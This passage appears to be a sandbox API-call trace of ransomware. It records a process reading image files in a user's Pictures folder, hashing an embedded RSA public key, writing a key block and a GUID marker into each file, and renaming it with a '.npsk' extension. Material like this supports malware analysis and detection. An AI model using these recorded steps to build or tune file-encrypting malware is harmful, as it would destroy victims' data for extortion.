lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x864e, lpOverlapped=0x0) returned 1 [0217.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.248] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.248] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.248] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.249] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.249] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.249] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.249] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.249] GetLastError () returned 0x0 [0217.249] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.249] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.249] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.249] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.249] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.249] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.250] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x864e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.250] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.250] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.250] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.250] CloseHandle (hObject=0x61c) returned 1 [0217.252] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\bh4Zlqq4w.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\bh4zlqq4w.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\bh4Zlqq4w.jpg.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\bh4zlqq4w.jpg.npsk")) returned 1 [0217.253] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6c69d10, ftCreationTime.dwHighDateTime=0x1d5e4b9, ftLastAccessTime.dwLowDateTime=0xf6d83310, ftLastAccessTime.dwHighDateTime=0x1d5dfe0, ftLastWriteTime.dwLowDateTime=0xf6d83310, ftLastWriteTime.dwHighDateTime=0x1d5dfe0, nFileSizeHigh=0x0, nFileSizeLow=0x1156c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D1hHoZdJ5h9S-Dz.gif", cAlternateFileName="D1HHOZ~1.GIF")) returned 1 [0217.254] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\D1hHoZdJ5h9S-Dz.gif") returned=".gif" [0217.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\D1hHoZdJ5h9S-Dz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\d1hhozdj5h9s-dz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.255] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=71020) returned 1 [0217.255] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.257] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11546, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.257] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.258] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.259] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1156c, lpOverlapped=0x0) returned 1 [0217.260] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.260] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.260] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.260] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.261] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.261] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.261] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.261] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.261] GetLastError () returned 0x0 [0217.261] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.261] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.261] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.261] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.261] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.262] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.262] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1156c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.262] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.263] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.263] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.263] CloseHandle (hObject=0x61c) returned 1 [0217.264] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\D1hHoZdJ5h9S-Dz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\d1hhozdj5h9s-dz.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\D1hHoZdJ5h9S-Dz.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\d1hhozdj5h9s-dz.gif.npsk")) returned 1 [0217.265] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1069fb0, ftCreationTime.dwHighDateTime=0x1d5e7a5, ftLastAccessTime.dwLowDateTime=0x8b802890, ftLastAccessTime.dwHighDateTime=0x1d5e628, ftLastWriteTime.dwLowDateTime=0x8b802890, ftLastWriteTime.dwHighDateTime=0x1d5e628, nFileSizeHigh=0x0, nFileSizeLow=0x7fd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGNY3o 7t.png", cAlternateFileName="DGNY3O~1.PNG")) returned 1 [0217.266] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\DGNY3o 7t.png") returned=".png" [0217.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\DGNY3o 7t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\dgny3o 7t.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.266] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=32723) returned 1 [0217.266] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.268] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7fad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.268] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.270] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7fd3, lpOverlapped=0x0) returned 1 [0217.271] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.271] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.271] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.271] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.272] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.272] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.272] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.272] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.272] GetLastError () returned 0x0 [0217.272] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.272] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.272] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.272] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.272] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.273] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.273] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7fd3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.273] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.273] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.273] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.274] CloseHandle (hObject=0x61c) returned 1 [0217.275] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\DGNY3o 7t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\dgny3o 7t.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\DGNY3o 7t.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\dgny3o 7t.png.npsk")) returned 1 [0217.279] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7efac20, ftCreationTime.dwHighDateTime=0x1d5e582, ftLastAccessTime.dwLowDateTime=0x316cb0e0, ftLastAccessTime.dwHighDateTime=0x1d5d7ef, ftLastWriteTime.dwLowDateTime=0x316cb0e0, ftLastWriteTime.dwHighDateTime=0x1d5d7ef, nFileSizeHigh=0x0, nFileSizeLow=0x7ac6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OalHUV.gif", cAlternateFileName="")) returned 1 [0217.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\OalHUV.gif") returned=".gif" [0217.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\OalHUV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\oalhuv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.280] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=31430) returned 1 [0217.280] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.281] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.281] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.283] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7ac6, lpOverlapped=0x0) returned 1 [0217.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.284] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.285] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.285] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.285] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.285] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.285] GetLastError () returned 0x0 [0217.285] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.285] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.285] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.285] UuidToStringA (in: 